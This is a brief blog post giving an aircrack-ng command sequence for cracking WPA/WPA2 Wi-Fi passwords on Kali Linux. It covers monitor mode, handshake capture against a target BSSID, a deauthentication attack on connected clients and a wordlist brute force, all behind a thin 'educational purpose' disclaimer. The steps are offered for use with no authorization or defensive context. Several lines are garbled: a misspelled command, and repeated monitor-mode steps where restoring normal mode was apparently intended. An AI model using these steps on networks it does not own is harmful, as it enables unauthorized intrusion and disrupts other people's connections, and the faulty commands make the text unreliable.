How to Crack WPA & WPA2 Wifi with Aircrack-ng on Kali Linux

Aircrack-ng best WiFi penetration testing tool used by hackers. In this tutorial we are going to teach you How to Crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only.

Note: This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.

Things we used for Cracking WPA & WPA2:

Command to Crack WPA & WPA2:

airmon-ng 

sudo ifconfig wlan0 down

sudo iwconfig wlan0 mode monitor

sudo ifconfig wlan0 up

airodump-ng wlan0 

airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0

aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0

aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap

sudo ifconfig wlan0 down

sudo iwcofnig wlan0 mode monitor

sudo ifconfig wlan0 up 

Here is a YouTube video on How to Crack WPA and WPA2 with Aircrack-ng on Kali Linux:


In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.
How to Crack WPA & WPA2 Wifi with Aircrack-ng on Kali Linux How to  Crack WPA & WPA2 Wifi with Aircrack-ng on Kali Linux Reviewed by Krutik on 10:19:00 Rating: 5

No comments:

Powered by Blogger.